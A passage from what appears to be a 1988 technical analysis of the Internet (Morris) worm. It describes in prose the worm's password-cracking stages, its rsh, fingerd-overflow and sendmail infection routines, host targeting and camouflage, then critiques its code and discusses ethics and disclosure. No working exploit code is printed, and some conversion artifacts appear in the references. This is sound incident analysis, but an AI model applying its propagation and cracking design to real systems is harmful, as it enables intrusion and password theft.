a parameter of zero each time the loop index modulo 10 was zero
\(i.e., every 10 calls\). Repeated calls were made to
try_password with the values discussed earlier in \2474-8b. Once
all accounts had been tried, the variable cmode was set to 2.
5.2.8. crack_2
This routine used the mini-dictionary in an attempt to break user
passwords \(see Appendix A\). The dictionary was first permuted
\(using the permute\) call. Each word was decrypted in- place by
XORing its bytes with 0x80. The decrypted word was then passed to
the try_password routine for each user account. The word was then
re-encrypted. A global index, named nextw was incremented to
point to the next dictionary entry. The nextw index is also used
in doit to determine if enough effort had been expended so that
the worm could ``...go gently into that good night.'' When no
more words were left, the variable cmode was set to 3. There are
two interesting points to note in this routine: the reverse of
these words were not tried, although that would seem like a
logical thing to do, and all words were encrypted and decrypted
in place rather than in a temporary buffer. This is less
efficient than a copy while masking since no re-encryption ever
needs to be done. As discussed in the next section, many examples
of unnecessary effort such as this were present in the program.
Furthermore, the entire mini-dictionary was decrypted all at once
rather than a word at a time. This would seem to lessen the
benefit of encrypting those words at all, since the entire
dictionary would then be present in memory as plaintext during
the time all the words were tried.
5.2.9. crack_3
This was the last password cracking routine. It opened
/usr/dict/words, and for each word found it called try_password
against each account. If the first letter of the word was a
capital, it was converted to lower case and retried. After all
words were tried, the variable cmode was incremented and the
routine returned. In this routine, no calls to other_sleep were
interspersed, thus leading to processes that ran for a long time
before checking for other worms on the local machine. Also of
note, this routine did not try the reverse of words either!
5.2.10. cracksome
This routine was a simple switch statement on an external
variable named cmode and it implemented the five strategies
discussed in \2474-8 of this paper. State zero called crack_0,
state one called crack_1, state two called crack_2, and state
three called crack_3. The default case simply returned.
5.2.11. crypt
This routine took a key and a salt, then performed the UNIX
password encryption function on a block of zero bits. The return
value of the routine was a pointer to a character string of 13
characters representing the encoded password. The routine was
highly optimized and differs considerably from the standard
library version of the same routine. It called the following
routines: compkeys, mungE, des, and ipi. A routine, setupE, was
also present and was associated with this code, but it was never
referenced. It appears to duplicate the functionality of the
mungE function.
5.2.12. h_addaddr
This routine added alternate addresses to a host entry in the
global list if they were not already present.
5.2.13. h_addname
This routine added host aliases \(names\) to a given host entry.
Duplicate entries were suppressed.
5.2.14. h_addr2host
The host address provided to the routine was checked against each
entry in the global host list to see if it was already present.
If so, a pointer to that host entry was returned. If not, and if
a parameter flag was set, a new entry was initialized with the
argument address and a pointer to it was returned.
5.2.15. h_clean
This routine traversed the host list and removed any entries
marked as infected or immune \(leaving hosts not yet tried\).
5.2.16. h_name2host
Just like h_addr2host except the comparison was done by name with
all aliases.
5.2.17. ha
This routine tried to infect hosts on remote networks. First, it
checked to see if the gateways list had entries; if not, it
called rt_init. Next, it constructed a list of all IP addresses
for gateway hosts that responded to the try_telnet routine. The
list of host addresses was randomized by permute. Then, for each
address in the list so constructed, the address was masked with
the value returned by netmaskfor and the result was passed to the
attack_network routine. If an attack was successful, the routine
exited early with a return value of TRUE.
5.2.18. hg
This routine attempted to infect gateway machines. It first
called rt_init to reinitialize the list of gateways, and then for
each gateway it called the main infection routine, infect, with
the gateway as an argument. As soon as one gateway was
successfully infected, the routine returned TRUE.
5.2.19. hi
This routine tried to infect hosts whose entries in the hosts
list were marked as equivalent. The routine traversed the global
host list looking for such entries and then calling infect with
those hosts. A successful infection returned early with the value
TRUE.
5.2.20. hl
This routine was intended to attack hosts on directly-connected
networks. For each alternate address of the current host, the
routine attack_network was called with an argument consisting of
the address logically and-ed with the value of netmask for that
address. A success caused the routine to return early with a
return value of TRUE.
5.2.21. hul
This function attempted to attack a remote host via a particular
user. It first checked to make sure that the host was not the
current host and that it had not already been marked as infected.
Next, it called getaddrs to be sure there was an address to be
used. It examined the username for punctuation characters, and
returned if any were found. It then called other_sleep with an
argument of 1. Next, the code tried the attacks described in
\2474-10. Calls were made to sendworm if either attack succeeded
in establishing a shell on the remote machine.
5.2.22. if_init
This routine constructed the list of interfaces using ioctl
calls. In summary, it obtained information about each interface
that was up and running, including the destination address in
point-to-point links, and any netmask for that interface. It
initialized the me pointer to the first non-loopback address
found, and it entered all alternate addresses in the address
list.
5.2.23. infect
This was the main infection routine. First, the host argument was
checked to make sure that it was not the current host, that it
was not currently infected, and that it had not been determined
to be immune. Next, a check was made to be sure that an address
for the host could be found by calling getaddrs. If no address
was found, the host was marked as immune and the routine returned
FALSE. Next, the routine called other_sleep with a timeout of 1.
Following that, it tried, in succession, calls to try_rsh,
try_fingerd, and try_sendmail. If the calls to try_rsh or
try_fingerd
succeeded, the file descriptors established by those invocations
were passed as arguments to the sendworm call. If any of the
three infection attempts succeeded, infect returned early with a
value of TRUE. Otherwise, the routine returned FALSE.
5.2.24. loadobject
This routine read an object file into the objects structure in
memory. The file was opened and the size found with a call to the
library routine fstat. A buffer was malloc'd of the appropriate
size, and a call to read was made to read the contents of the
file. The buffer was encrypted with a call to xorbuf, then
transferred into the objects array. The suffix of the name
\(e.g., sun3.o, l1.c, vax.o\) was saved in a field in the
structure, as was the size of the object.
5.2.25. makemagic
The routine used the library random call to generate a random
number for use as a challenge number. Next, it tried to connect
to the telnet port \(#23\) of the target host, using each
alternate address currently known for that host. If a successful
connection was made, the library call getsockname was called to
get the canonical IP address of the current host relative to the
target. Next, up to 1024 attempts were made to establish a TCP
socket, using port numbers generated by taking the output of the
random number generator modulo 32767. If the connection was
successful, the routine returned the port number, the file
descriptor of the socket, the canonical IP address of the current
host, and the challenge number.
5.2.26. netmaskfor
This routine stepped through the interfaces array and checked the
given address against those interfaces. If it found that the
address was reachable through a connected interface, the netmask
returned was the netmask associated with that interface.
Otherwise, the return was the default netmask based on network
type \(Class A, Class B, Class C\).
5.2.27. other_sleep
This routine checked a global variable named other_fd. If the
variable was less than zero, the routine simply called sleep with
the provided timeout argument, then returned. Otherwise, the
routine waited on a select system call for up to the value of the
timeout. If the timeout expired, the routine returned. Otherwise,
if the select return code indicated there was input pending on
the other_fd descriptor, it meant there was another worm on the
current machine. A connection was established and an exchange of
``magic'' numbers was made to verify identity. The local worm
then wrote a random number \(produced by random\) to the other
worm via the socket. The reply was read and a check was made to
ensure that the response came from the localhost \(127.0.0.1\).
The file descriptor was closed. If the random value sent plus the
response was an odd number, the other_fd variable was set to -1
and the pleasequit variable was set to 1. This meant that the
local worm would die when conditions were right \(cf. doit \),
and that it would no longer attempt to contact other worms on the
local machine. If the sum was even, the other worm was destined
to die.
5.2.28. permute
This routine randomized the order of a list of objects. This was
done by executing a loop once for each item in the list. In each
iteration of the loop, the random number generator was called
modulo the number of items in the list. The item in the list
indexed by that value was swapped with the item in the list
indexed by the current loop value \(via a call to bcopy\).
5.2.29. rt_init
This initialized the list of gateways. It started by setting an
external counter, ngateways, to zero. Next, it invoked the
command ``/usr/ucb/netstat -r -n'' using a popen call. The code
then looped while output was received from the netstat command: A
line was read. A call to other_sleep was made with a timeout of
zero. The input line was parsed into a destination and a gateway.
If the gateway was not a valid IP address, or if it was the
loopback address \(127.0.0.1\), it was discarded. The value was
then compared against all the gateway addresses already known;
duplicates were skipped. It was also compared against the list of
local interfaces \(local networks\), and discarded if a
duplicate. Otherwise, it was added to the list of gateways and
the counter incremented.
5.2.30. scan_gateways
First, the code called permute to randomize the gateways list.
Next, it looped over each gateway or the first 20, whichever was
less: A call was made to other_sleep with a timeout of zero. The
gateway IP address was searched for in the host list; a new entry
was allocated for the host if none currently existed. The gateway
flag was set in the flags field of the host entry. A call was
made to the library routine gethostbyaddr with the IP number of
the gateway. The name, aliases and address fields were added to
the host list, if not already present. Then a call was made to
gethostbyname and alternate addresses were added to the host
list. After this loop was executed, a second loop was started
that did effectively the same thing as the first! There is no
clear reason why this was done, unless it is a remnant of earlier
code, or a stub for future additions.
5.2.31. send_message
This routine made a call to random and 14 out of 15 times
returned without doing anything. In the 15th case, it opened a
stream socket to host ``ernie.berkeley.edu'' and then tried to
send an uninitialized byte using the sendto call. This would not
work \(using a UDP send on a TCP socket\).
5.2.32. sendworm
This routine sent the worm code over a connected TCP circuit to a
remote machine. First it checked to make sure that the objects
table held a copy of the l1.c code \(see Appendix B\). Next, it
called makemagic to get a local socket established and to
generate a challenge string. Then, it encoded and wrote the
script detailed previously in \2474-2a. Finally, it called
waithit and returned the result code of that routine. The object
files shipped across the link were decrypted in memory first by a
call to xorbuf and then re-encrypted afterwards.
5.2.33. supports_rsh
This routine determined if the target host, specified as an
argument, supported the BSD- derived rsh protocol. It did this by
creating a socket and attempting a TCP connection to port 514 on
the remote machine. A timeout or connect failure caused a return
of FALSE; otherwise, the socket was closed and the return value
was TRUE.
5.2.34. supports_telnet
This routine determined if a host was reachable and supported the
telnet protocol \(i.e., was probably not a router or similar
``dumb'' box\). It was similar to supports_rsh in nature. The
code established a socket, connected to the remote machine on
port 23, and returned FALSE if an error or timeout occurred;
otherwise, the socket was closed and TRUE was returned.
5.2.35. try_fingerd
This routine tried to establish a connection to a remote finger
daemon on the given host by connecting to port 79. If the
connection succeeded, it sent across an overfull buffer as
described in \2474-8b and waited to see if the other side became
a shell. If so, it returned the file descriptors to the caller;
otherwise, it closed the socket and returned a failure code.
5.2.36. try_password
This routine called crypt with the password attempt and compared
the result against the encrypted password in the pwd entry for
the current user. If a match was found, the unencrypted password
was copied into the pwd structure, and the routine attack_user
was invoked.
5.2.37. try_rsh
This function created two pipes and then forked a child process.
The child process attempted to rexec a remote shell on the host
specified in the parameters, using the specified username and
password. Then the child process tried to invoke the rsh command
by attempting to run, in order, ``/usr/ucb/rsh,''
``/usr/bin/rsh,'' and ``/bin/rsh.'' If the remote shell
succeeded, the function returned the file descriptors of the open
pipe. Otherwise, it closed all file descriptors, killed the child
with a SIGKILL, and reaped it with a call to wait3.
5.2.38. try_sendmail
This routine attempted to establish a connection to the SMTP port
\(#25\) on the remote host. If successful, it conducted the
dialog explained in \2474-2b. It then called the waithit routine
to see if the infection ``took.'' Return codes were checked after
each line was transmitted, and if a return code indicated a
problem, the routine aborted after sending a ``quit'' message.
5.2.39. waithit
This function acted as the bootstrap server for a vector program
on a remote machine. It waited for up to 120 seconds on the
socket created by the makemagic routine, and if no connection was
made it closed the socket and returned a failure code. Likewise,
if the first thing received was not the challenge string shipped
with the bootstrap program, the socket was closed and the routine
returned. The routine decrypted each object file using xorbuf and
sent it across the connection to the vector program \(see
Appendix B\). Then a script was transmitted to compile and run
the vector. This was described in \2474-4. If the remote host was
successfully infected, the infected flag was set in the host
entry and the socket closed. Otherwise, the routine sent rm
command strings to delete each object file. The function returned
the success or failure of the infection.
5.2.40. xorbuf
This routine was somewhat peculiar. It performed a simple
encryption/decryption function by XORing the buffer passed as an
argument with the first 10 bytes of the xorbuf routine itself!
This code would not work on a machine with a split I/D space or
on tagged architectures.
6. Analysis of the Code
6.1. Structure and Style
An examination of the reverse-engineered code of the worm is
instructive. Although it is not the same as reading the original
code, it does reveal some characteristics of the author\(s\). One
conclusion that may surprise some people is that the quality of
the code is mediocre, and might even be considered poor. For
instance, there are places where calls are made to functions with
either too many or too few arguments. Many routines have local
variables that are either never used, or are potentially used
before they are initialized. In at least one location, a struct
is passed as an argument rather than the address of the struct.
There is also dead code, as routines that are never referenced,
and as code that cannot be executed because of conditions that
are never met \(possibly bugs\). It appears that the author\(s\)
never used the lint utility on the program. At many places in the
code, there are calls on system routines and the return codes are
never checked for success. In many places, calls are made to the
system heap routine, malloc and the result is immediately used
without any check. Although the program was configured not to
leave a core file or other evidence if a fatal failure occurred,
the lack of simple checks on the return codes is indicative of
sloppiness; it also suggests that the code was written and run
with minimal or no testing. It is certainly possible that some
checks were written into the code and elided subject to
conditional compilation flags. However, there would be little
reason to remove those checks from the production version of the
code. The structures chosen for some of the internal data are
also revealing. Everything was represented as linked lists of
structures. All searches were done as linear passes through the
appropriate list. Some of these lists could get quite long and
doubtless that considerable CPU time was spent by the worm just
maintaining and searching these lists. A little extra code to
implement hash buckets or some form of sorted lists would have
added little overhead to the program, yet made it much more
efficient \(and thus quicker to infect other hosts and less
obvious to system watchers\). Linear lists may be easy to code,
but any experienced programmer or advanced CS student should be
able to implement a hash table or lists of hash buckets with
little difficulty. Some effort was duplicated in spots. An
example of this was in the code that tried to break passwords.
Even if the password to an account had been found in an earlier
stage of execution, the worm would encrypt every word in the
dictionary and attempt a match against it. Similar redundancy can
be found in the code to construct the lists of hosts to infect.
There are locations in the code where it appears that the
author\(s\) meant to execute a particular function but used the
wrong invocation. The use of the UDP send on a TCP socket is one
glaring example. Another example is at the beginning of the
program where the code sends a KILL signal to its parent process.
The surrounding code gives strong indication that the user
actually meant to do a killpg instead but used the wrong call.
The one section of code that appears particularly well-thought-
out involves the crypt routines used to check passwords. As has
been noted in [Seel88], this code is nine times faster than the
standard Berkeley crypt function. Many interesting modifications
were made to the algorithm, and the routines do not appear to
have been written by the same author as the rest of the code.
Additionally, the routines involved have some support for both
encryption anddecryption\320even though only encryption was
needed for the worm. This supports the assumption that this
routine was written by someone other than the author\(s\) of the
program, and included with this code. It would be interesting to
discover where this code originated and how it came to be in the
Worm program. The program could have been much more virulent had
the author\(s\) been more experienced or less rushed in her/his
coding. However, it seems likely that this code had been
developed over a long period of time, so the only conclusion that
can be drawn is that the author\(s\) was sloppy or careless \(or
both\), and perhaps that the release of the worm was premature.
6.2. Problems of Functionality
There is little argument that the program was functional. In
fact, we all wish it had been less capable! However, we are lucky
in the sense that the program had flaws that prevented it from
operating to the fullest. For instance, because of an error, the
code would fail to infect hosts on a local area network even
though it might identify such hosts. Another example of
restricted functionality concerns the gathering of hostnames to
infect. As noted already, the code failed to gather host names
>From user .rhosts files early on. It also did not attempt to
collect host names from other user and system files containing
such names \(e.g., /etc/hosts.lpd\). Many of the operations could
have been done ``smarter.'' The case of using linear structures
has already been mentioned. Another example would have been to
sort user passwords by the salt used. If the same salt was
present in more than one password, then all those passwords could
be checked in parallel as a single pass was made through the
dictionaries. On our machine, 5% of the 200 passwords share the
same salts, for instance. No special advantage was taken if the
root password was compromised. Once the root password has been
broken, it is possible to fork children that set their uid and
environment variables to match each designated user. These
processes could then attempt the rsh attack described earlier in
this report. Instead, root is treated as any other account. It
has been suggested to me that this treatment of root may have
been a conscious choice of the worm author\(s\). Without knowing
the true motivation of the author, this is impossible to decide.
However, considering the design and intent of the program, I find
it difficult to believe that such exploitation would have been
omitted if the author had thought of it. The same attack used on
the finger daemon could have been extended to the Sun version of
the program, but was not. The only explanations that come to mind
why this was not done are that the author lacked the motivation,
the ability, the time, or the resources to develop a version for
the Sun. However, at a recent meeting, Professor Rick Rashid of
Carnegie-Mellon University was heard to claim that Robert T.
Morris, the alleged author of the worm, had revealed the fingerd
bug to system administrative staff at CMU well over a year ago.
15
Assuming this report is correct and the worm author is indeed Mr.
Morris, it is obvious that there was sufficient time to construct
a Sun version of the code. In fact, I asked three Purdue graduate
students \(Shawn D. Ostermann, Steve J. Chapin, and Jim N.
Griffoen to develop a Sun 3 version of the attack, and they did
so in under three hours. The Worm author certainly must have had
access to Suns or else he would not have been able to provide Sun
binaries to accompany the operational worm. Motivation should
also not be a factor considering everything else present in the
program. With time and resources available, the only reason I
cannot immediately rule out is that he lacked the knowledge of
how to implement a Sun version of the attack. This seemsunlikely,
but given the inconsistent nature of the rest of the code, it is
certainly a possibility. However, if this is the case, it raises
a new question: was the author of the Worm the original author of
the VAX fingerd attack? Perhaps the most obvious shortcoming of
the code is the lack of understanding about propagation and load.
The reason the worm was spotted so quickly and caused so much
disruption was because it replicated itself exponentially on some
networks, and because each worm carried no history with it.
Admittedly, there was a check in place to see if the current
machine was already infected, but one out of every seven worms
would never die even if there was an existing infestation.
Furthermore, worms marked for self-destruction would continue to
execute up to the point of having made at least one complete pass
through the password file. Many approaches could have been taken
by the author\(s\) to slow the growth of the worm or prevent
reinfestation; little is to be gained from explaining them here,
but their absence from the worm program is telling. Either the
author\(s\) did not have any understanding of how the program
would propagate, or else she/he/they did not care; the existence
in the Worm of mechanisms to limit growth tends to indicate that
it was a lack of understanding rather than indifference. Some of
the algorithms used by the Worm were reasonably clever. One in
particular is interesting to note: when trying passwords from the
built-in list, or when trying to break into connected hosts, the
worm would randomize the list of candidates for trial. Thus, if
more than one worm were present on the local machine, they would
be more likely to try candidates in a different order, thus
maximizing their coverage. This implies, however \(as does the
action of the pleasequit variable\) that the author\(s\) was not
overly concerned with the presence of multiple worms on the same
machine. More to the point, multiple worms were allowed for a
while in an effort to maximize the spread of the infection. This
also supports the contention that the author did not understand
the propagation or load effects of the Worm. The design of the
vector program, the ``thinning'' protocol, and the use of the
internal state machine were all clever and non-obvious. The
overall structure of the program, especially the code associated
with IP addresses, indicates considerable knowledge of networking
and the routines available to support it. The knowledge evidenced
by that code would indicate extensive experience with networking
facilities. This, coupled with some of the errors in the Worm
code related to networking, further support the thesis that the
author was not a careful programmer\320the errors in those parts
of the code were probably not errors because of ignorance or
inexperience.
6.3. Camouflage
Great care was taken to prevent the worm program from being
stopped. This can be seen by the caution with which new files
were introduced into a machine, including the use of random
challenges. It can be seen by the fact that every string compiled
into the worm was encrypted to prevent simple examination. It was
evidenced by the care with which files associated with the worm
were deleted from disk at the earliest opportunity, and the
corresponding contents were encrypted in memory when loaded. It
was evidenced by the continual forking of the process, and the
\(faulty\) check for other instances of the worm on the local
host. The code also evidences precautions against providing
copies of itself to anyone seeking to stop the worm. It sets its
resource limits so it cannot dump a core file, and it keeps
internal data encrypted until used. Luckily, there are other
methods of obtaining core files and data images, and researchers
were able to obtain all the information they needed to
disassemble and reverse-engineer the code. There is no doubt,
however, that the author\(s\) of the worm intended to make such a
task as difficult as possible.
6.4. Specific Comments
Some more specific comments are worth making. These are directed
to particular aspects of the code rather than the program as a
whole.
6.4.1. The sendmail attack
Many sites tend to experience substantial loads because of heavy
mail traffic. This is especially true at sites with mailing list
exploders. Thus, the administrators at those sites have
configured their mailers to queue incoming mail and process the
queue periodically. The usual configuration is to set sendmail to
run the queue every 30 to 90 minutes. The attack through sendmail
would fail on these machines unless the vector program were
delivered into a nearly empty queue within 120 seconds of it
being processed. The reason for this is that the infecting worm
would only wait on the server socket for two minutes after
delivering the ``infecting mail.'' Thus, on systems with delayed
queues, the vector process would not get built in time to
transfer the main worm program over to the target. The vector
process would fail in its connection attempt and exit with a
non-zero status. Additionally, the attack through sendmail
invoked the vector program without a specific path. That is, the
program was invoked with ``foo'' instead of ``./foo'' as was done
with the shell-based attack. As a result, on systems where the
default path used by sendmail's shell did not contain the current
directory \(``.''\), the invocation of the code would fail. It
should be noted that such a failure interrupts the processing of
subsequent commands \(such as the rm of the files\), and this may
be why many system administrators discovered copies of the vector
program source code in their /usr/tmp directories.
6.4.2. The machines involved
As has already been noted, this attack was made only on Sun 3
machines and VAX machines running BSD UNIX. It has been observed
in at least one mailing list that had the Sun code been compiled
with the -mc68010 flag, more Sun machines would have fallen
victim to the worm. It is a matter of some curiosity why more
machines were not targeted for this attack. In particular, there
are many Pyramid, Sequent, Gould, Sun 4, and Sun i386 machines on
the net.
16
If binary files for those had also been included, the worm could
have spread much further. As it was, some locations such as Ohio
State were completely spared the effects of the worm because all
their ``known'' machines were of a type that the worm could not
infect. Since the author of the program knew how to break into
arbitrary UNIX machines, it seems odd that he/she did not attempt
to compile the program on foreign architectures to include with
the worm.
6.4.3. Portability considerations
The author\(s\) of the worm may not have had much experience with
writing portable UNIX code, including shell scripts. Consider
that in the shell script used to compile the vector, the
following command is used: if [ -f sh ] The use of the [
character as a synonym for the test function is not universal.
UNIX users with experience writing portable shell files tend to
spell out the operator test rather than rely on therebeing a link
to a file named ``['' on any particular system. They also know
that the test operator is built-in to many shells and thus faster
than the external [ variant. The test invocation used in the worm
code also uses the -f flag to test for presence of the file named
sh. This provided us with the worm ``condom'' published Thursday
night:
17
creating a directory with the name sh in /usr/tmp causes this
test to fail, as do later attempts to create executable files by
that name. Experienced shell programmers tend to use the -e
\(exists\) flag in circumstances such as this, to detect not only
directories, but sockets, devices, named FIFOs, etc. Other
colloquialisms are present in the code that bespeak a lack of
experience writing portable code. One such example is the code
loop where file units are closed just after the vector program
starts executing, and again in the main program just after it
starts executing. In both programs, code such as the following is
executed: for \(i = 0; i < 32; i++\) close\(i\); The portable way
to accomplish the task of closing all file descriptors \(on
Berkeley-derived systems\) is to execute: for \(i = 0; i <
getdtablesize\(\); i++\) close \(i\); or the even more efficient
for \(i = getdtablesize\(\)-1; i >= 0; i--\) close\(i\); This is
because the number of file units available \(and thus open\) may
vary from system to system.
6.5. Summary
Many other examples can be drawn from the code, but the points
should be obvious by now: the author of the worm program may have
been a moderately experienced UNIX programmer, but s/he was by no
means the ``UNIX Wizard'' many have been claiming. The code
employs a few clever techniques and tricks, but there is some
doubt if they are all the original work of the Worm author. The
code seems to be the product of an inexperienced or sloppy
programmer. The person \(or persons\) who put this program
together appears to lack fundamental insight into some
algorithms, data structures, and network propagation, but at the
same time has some very sophisticated knowledge of network
features and facilities. The code does not appear to have been
tested \(although anything other than unit testing would not be
simple to do\), or else it was prematurely released. Actually, it
is possible that both of these conclusions are correct. The
presence of so much dead and duplicated code coupled with the
size of some data structures \(such as the 20-slot object code
array\) argues that the program was intended to be more
comprehensive.
7. Conclusions
It is clear from the code that the worm was deliberately designed
to do two things: infect as many machines as possible, and be
difficult to track and stop. There can be no question that this
was in any way an accident, although its release may have been
premature. It is still unknown if this worm, or a future version
of it, was to accomplish any other tasks. Although an author has
been alleged \(Robert T. Morris\), he has not publicly confessed
nor has the matter been definitively proven. Considering the
probability of both civil and criminal legal actions, a
confession and an explanation are unlikely to be forthcoming any
time soon. Speculation has centered on motivations as diverse as
revenge, pure intellectual curiosity, and a desire to impress
someone. This must remain speculation for the time being,
however, since we do not have access to a definitive statement
>From the author\(s\). At the least, there must be some question
about the psychological makeup of someone who would build and run
such software.
18
Many people have stated that the authors of this code
19
must have been ``computer geniuses'' of some sort. I have been
bothered by that supposition since first hearing it, and after
having examined the code in some depth, I am convinced that this
program is not evidence to support any such claim. The code was
apparently unfinished and done by someone clever but not
particularly gifted, at least in the way we usually associate
with talented programmers and designers. There were many bugs and
mistakes in the code that would not be made by a careful,
competent programmer. The code does not evidence clear
understanding of good data structuring, algorithms, or even of
security flaws in UNIX. It does contain clever exploitations of
two specific flaws in system utilities, but that is hardly
evidence of genius. In general, the code is not that impressive,
and its ``success'' was probably due to a large amount of luck
rather than any programming skill possessed by the author. Chance
favored most of us, however. The effects of this worm were
\(largely\) benign, and it was easily stopped. Had the code been
tested and developed further by someone more experienced, or had
it been coupled with something destructive, the toll would have
been considerably higher. I can easily think of several dozen
people who could have written this program, and not only done it
with far fewer \(if any\) errors, but made it considerably more
virulent. Thankfully, those individuals are all responsible,
dedicated professionals who would not consider such an act. What
we learn from this about securing our systems will help determine
if this is the only such incident we ever need to analyze. This
attack should also point out that we need a better mechanism in
place to coordinate information about security flaws and attacks.
The response to this incident was largely ad hoc, and resulted in
both duplication of effort and a failure to disseminate valuable
information to sites that needed it. Many site administrators
discovered the problem from reading the newspaper or watching the
television. The major sources of information for many of the
sites affected seems to have been Usenet news groups and a
mailing list I put together when the worm was first discovered.
Although useful, these methods did not ensure timely, widespread
dissemination of useful information \320 especially since they
depended on the Internet to work! Over three weeks after this
incident some sites are still not reconnected to the Internet.
This is the second time in six months that a major panic has hit
the Internet community.The first occurred in May when a rumor
swept the community that a ``logic bomb'' had been planted in Sun
software by a disgruntled employee. Many, many sites turned their
system clocks back or they shut off their systems to prevent
damage. The personnel at Sun Microsystems responded to this in an
admirable fashion, conducting in-house testing to isolate any
such threat, and issuing information to the community about how
to deal with the situation. Unfortunately, almost everyone else
seems to have watched events unfold, glad that they were not the
ones who had to deal with the situation. The worm has shown us
that we are all affected by events in our shared environment, and
we need to develop better information methods outside the network
before the next crisis. This whole episode should cause us to
think about the ethics and laws concerning access to computers.
The technology we use has developed so quickly it is not always
simple to determine where the proper boundaries of moral action
may be. Many senior computer professionals started their careers
years ago by breaking into computer systems at their colleges and
places of employment to demonstrate their expertise. However,
times have changed and mastery of computer science and computer
engineering now involves a great deal more than can be shown by
using intimate knowledge of the flaws in a particular operating
system. Entire businesses are now dependent, wisely or not, on
computer systems. People's money, careers, and possibly even
their lives may be dependent on the undisturbed functioning of
computers. As a society, we cannot afford the consequences of
condoning or encouraging behavior that threatens or damages
computer systems. As professionals, computer scientists and
computer engineers cannot afford to tolerate the romanticization
of computer vandals and computer criminals. This incident should
also prompt some discussion about distribution of security-
related information. In particular, since hundreds of sites have
``captured'' the binary form of the worm, and since personnel at
those sites have utilities and knowledge that enables them to
reverse-engineer the worm code, we should ask how long we expect
it to be beneficial to keep the code unpublished? As I mentioned
in the introduction, at least five independent groups have
produced reverse-engineered versions of the worm, and I expect
many more have been done or will be attempted, especially if the
current versions are kept private. Even if none of these versions
is published in any formal way, hundreds of individuals will have
had access to a copy before the end of the year. Historically,
trying to ensure security of software through secrecy has proven
to be ineffective in the long term. It is vital that we educate
system administrators and make bug fixes available to them in
some way that does not compromise their security. Methods that
prevent the dissemination of information appear to be completely
contrary to that goal. Last, it is important to note that the
nature of both the Internet and UNIX helped to defeat the worm as
well as spread it. The immediacy of communication, the ability to
copy source and binary files from machine to machine, and the
widespread availability of both source and expertise allowed
personnel throughout the country to work together to solve the
infection even despite the widespread disconnection of parts of
the network. Although the immediate reaction of some people might
be to restrict communication or promote a diversity of
incompatible software options to prevent a recurrence of a worm,
that would be entirely the wrong reaction. Increasing the
obstacles to open communication or decreasing the number of
people with access to in-depth information will not prevent a
determined attacker\320it will only decrease the pool of
expertise and resources available to fight such an attack.
Further, such an attitude would be contrary to the whole purpose
of having an open, research-oriented network. The Worm was caused
by a breakdown of ethics as well as lapses in security\320a
purely technological attempt at prevention will not address the
full problem, and may just cause new difficulties.
Acknowledgments
Much of this analysis was performed on reverse-engineered
versions of the worm code. The following people were involved in
the production of those versions: Donald J. Becker of Harris
Corporation, Keith Bostic of Berkeley, Donn Seeley of the
University of Utah, Chris Torek of the University of Maryland,
Dave Pare of FX Development, and the team at MIT: Mark W. Eichin,
Stanley R. Zanarotti, Bill Sommerfeld, Ted Y. Ts'o, Jon Rochlis,
Ken Raeburn, Hal Birkeland and John T. Kohl. A disassembled
version of the worm code was provided at Purdue by staff of the
Purdue University Computing Center, Rich Kulawiec in particular.
Thanks to the individuals who reviewed early drafts of this paper
and contributed their advice and expertise: Don Becker, Kathy
Heaphy, Brian Kantor, R. J. Martin, Richard DeMillo, and
especially Keith Bostic and Steve Bellovin. My thanks to all
these individuals. My thanks and apologies to anyone who should
have been credited and was not.
References
Allm83. Allman, Eric,
Sendmail\320An Internetwork Mail Router,
University of California, Berkeley, 1983. Issued with the BSD
UNIX documentation set.
Brun75. Brunner, John, The Shockwave Rider, Harper & Row, 1975.
Cohe84. Cohen, Fred, ``Computer Viruses: Theory and
Experiments,'' PROCEEDINGS OF THE 7TH NATIONAL COMPUTER SECURITY
CONFERENCE, pp. 240-263, 1984.
Denn88. Denning, Peter J., ``Computer Viruses,'' AMERICAN
SCIENTIST, vol. 76, pp. 236-238, May-June 1988.
Dewd85. Dewdney, A. K., ``A Core War Bestiary of viruses, worms,
and other threats to computer memories,'' SCIENTIFIC AMERICAN,
vol. 252, no. 3, pp. 14-23, May 1985.
Gerr72. Gerrold, David, When Harlie Was One, Ballentine Books,
1972. The first edition.
Gram84. Grampp, Fred. T. and Robert H. Morris, ``UNIX Operating
System Security,''
AT&T BELL LABORATORIES TECHNICAL JOURNAL, vol. 63, no. 8, part 2,
pp. 1649-1672, Oct. 1984.
Harr77. Harrenstien, K., ``Name/Finger,'' RFC 742, SRI Network
Information Center, December 1977.
Morr79. Morris, Robert and Ken Thompson, ``UNIX Password
Security,'' COMMUNICATIONS OF THE ACM, vol. 22, no. 11, pp. 594-
597, ACM, November 1979.
Post82. Postel, Jonathan B., ``Simple Mail Transfer Protocol,''
RFC 821, SRI Network Information Center, August 1982.
Reid87. Reid, Brian, ``Reflections on Some Recent Widespread
Computer Breakins,'' COMMUNICATIONS OF THE ACM, vol. 30, no. 2,
pp. 103-105, ACM, February 1987.
Ritc79.Ritchie, Dennis M., ``On the Security of UNIX, '' in U nt
2 def IX nt 0 def
SUPPLEMENTARY DOCUMENTS, AT & T, 1979. Seel88. Seeley, Donn, ``A
Tour of the Worm,'' TECHNICAL REPORT, Computer Science Dept.,
University of Utah, November 1988. Unpublished report.
Shoc82. Shoch, John F. and Jon A. Hupp, ``The Worm Programs \320
Early Experience with a Distributed Computation,'' COMMUNICATIONS
OF THE ACM, vol. 25, no. 3, pp. 172-180, ACM, March 1982.
Appendix A The Dictionary
What follows is the mini-dictionary of words contained in the
worm. These were tried when attempting to break user passwords.
Looking through this list is, in some sense revealing, but
actually raises a significant question: how was this list chosen?
The assumption has been expressed by many people that this list
represents words commonly used as passwords; this seems unlikely.
Common choices for passwords usually include fantasy characters,
but this list contains none of the likely choices \(e.g.,
``hobbit,'' ``dwarf,'' ``gandalf,'' ``skywalker,'' ``conan''\).
Names of relatives and friends are often used, and we see women's
names like ``jessica,'' ``caroline,'' and ``edwina,'' but no
instance of the common names ``jennifer'' or ``kathy.'' Further,
there are almost no men's names such as ``thomas'' or either of
``stephen'' or ``steven'' \(or ``eugene''!\). Additionally, none
of these have the initial letters capitalized, although that is
often how they are used in passwords. Also of interest, there are
no obscene words in this dictionary, yet many reports of
concerted password cracking experiments have revealed that there
are a significant number of users who use such words \(or
phrases\) as passwords. The list contains at least one incorrect
spelling: ``commrades'' instead of ``comrades''; I also believe
that ``markus'' is a misspelling of ``marcus.'' Some of the words
do not appear in standard dictionaries and are non-English names:
``jixian,'' ``vasant,'' ``puneet,'' etc. There are also some
unusual words in this list that I would not expect to be
considered common: ``anthropogenic,'' ``imbroglio,'' ``umesh,''
``rochester,'' ``fungible,'' ``cerulean,'' etc. I imagine that
this list was derived from some data gathering with a limited set
